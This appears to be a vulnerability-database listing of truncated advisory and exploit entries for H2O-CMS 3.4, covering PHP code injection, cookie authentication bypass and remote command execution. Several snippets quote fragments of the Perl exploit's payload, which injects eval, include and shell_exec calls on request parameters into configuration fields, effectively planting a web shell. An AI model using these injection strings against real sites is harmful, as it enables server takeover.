H2O-CMS 3.4 PHP Code Injection and Cookie Authentication Bypass Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/31961/info H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability. An attacker can exploit the PHP code-injection issue to inject and execute arbitrary malicious PHP code i...

H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability

No description provided by source. ---------------------------------------------------------- H2O-CMS = 3.4 Insecure Cookie Handling Vulnerability Discovered By Mountassif Moad Download On http://sourceforge.net/projects/h2o-cms Home World http://v4-team.com...

H2O-CMS <= 3.4 - Remote Command Execution Exploit (mq = off)

No description provided by source. !/usr/bin/perl ---------------------------------------------------------- H2O-CMS = 3.4 Remote Command Execution Exploit mq = Off Discovered By StAkeRathotmaildotit Download On http://sourceforge.net/projects/h2o-cms...

H2O-CMS 3.4 - Insecure Cookie Handling

---------------------------------------------------------- H2O-CMS = 3.4 Insecure Cookie Handling Vulnerability Discovered By Mountassif Moad Download On http://sourceforge.net/projects/h2o-cms Home World http://v4-team.com ---------------------------------------------------------- Exploit:...

H2O-CMS 3.4 - Insecure Cookie Handling

H2O-CMS 3.4 - Insecure Cookie Handling ---------------------------------------------------------- H2O-CMS = 3.4 Insecure Cookie Handling Vulnerability Discovered By Mountassif Moad Download On http://sourceforge.net/projects/h2o-cms Home World http://v4-team.com...

H2O-CMS &lt;= 3.4 Insecure Cookie Handling Vulnerability

No description provided by source. ---------------------------------------------------------- H2O-CMS = 3.4 Insecure Cookie Handling Vulnerability Discovered By Mountassif Moad Download On http://sourceforge.net/projects/h2o-cms Home World http://v4-team.com...

H2O-CMS &lt;= 3.4 Remote Command Execution Exploit (mq = off)

No description provided by source. !/usr/bin/perl ---------------------------------------------------------- H2O-CMS = 3.4 Remote Command Execution Exploit mq = Off Discovered By StAkeRathotmaildotit Download On http://sourceforge.net/projects/h2o-cms...

h2ocms-exec.txt

!/usr/bin/perl ---------------------------------------------------------- H2O-CMS '";""; errorreporting0; echo"//athos"; "', 'dbserver' = '";""; include$REQUEST"i"; "', 'dbname' = '";""; eval$REQUEST"g"; "', 'dbusername' = '";""; echo shellexec$REQUEST"c"; "', 'dbpassword' = '";""; echo...

H2O-CMS 3.4 - Remote Command Execution

!/usr/bin/perl ---------------------------------------------------------- H2O-CMS '";""; errorreporting0; echo"//athos"; "', 'dbserver' = '";""; include$REQUEST"i"; "', 'dbname' = '";""; eval$REQUEST"g"; "', 'dbusername' = '";""; echo shellexec$REQUEST"c"; "', 'dbpassword' = '";""; echo...

H2O-CMS 3.4 - Remote Command Execution

H2O-CMS 3.4 - Remote Command Execution !/usr/bin/perl ---------------------------------------------------------- H2O-CMS '";""; errorreporting0; echo"//athos"; "', 'dbserver' = '";""; include$REQUEST"i"; "', 'dbname' = '";""; eval$REQUEST"g"; "', 'dbusername' = '";""; echo shellexec$REQUEST"c"; "...

H2O-CMS 3.4 - PHP Code Injection Cookie Authentication Bypass

H2O-CMS 3.4 - PHP Code Injection Cookie Authentication Bypass source: https://www.securityfocus.com/bid/31961/info H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability. An attacker can exploit the PHP code-injection issue to inject and execute...

H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass

source: https://www.securityfocus.com/bid/31961/info H2O-CMS is prone to a PHP code-injection vulnerability and a cookie authentication-bypass vulnerability. An attacker can exploit the PHP code-injection issue to inject and execute arbitrary malicious PHP code in the context of the webserver...